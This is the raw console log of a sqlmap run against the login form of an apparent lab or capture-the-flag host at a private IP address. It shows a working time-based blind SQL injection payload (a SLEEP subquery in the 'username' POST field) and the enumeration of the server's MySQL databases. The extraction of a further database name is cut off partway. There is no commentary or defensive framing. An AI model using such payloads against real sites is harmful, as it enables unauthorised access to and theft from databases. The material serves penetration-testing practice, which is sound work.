 ___ ___[,]_____ ___ ___  {1.4.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:45:04 /2020-05-10/

[22:45:04] [INFO] parsing HTTP request from 'login.req'
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] y
[22:45:07] [INFO] resuming back-end DBMS 'mysql' 
[22:45:07] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.138.221:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 6446 FROM (SELECT(SLEEP(5)))lDrv) AND 'xQtp'='xQtp&password=admin&submit= Login
---
[22:45:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[22:45:23] [INFO] fetching database names
[22:45:23] [INFO] fetching number of databases
[22:45:23] [INFO] resumed: 4
[22:45:23] [INFO] resumed: information_schema
[22:45:23] [INFO] resumed: Webapp
[22:45:23] [INFO] resumed: mysql
[22:45:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[22:46:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[22:46:37] [INFO] adjusting time delay to 1 second due to good response times
perfor
[22:47:07] [ERROR] invalid character detected. retrying..
[22:47:07] [WARNING] increasing time delay to 2 seconds
m
[22:47:22] [ERROR] invalid character detected. retrying..
[22:47:22] [WARNING] increasing time delay to 3 seconds
ance
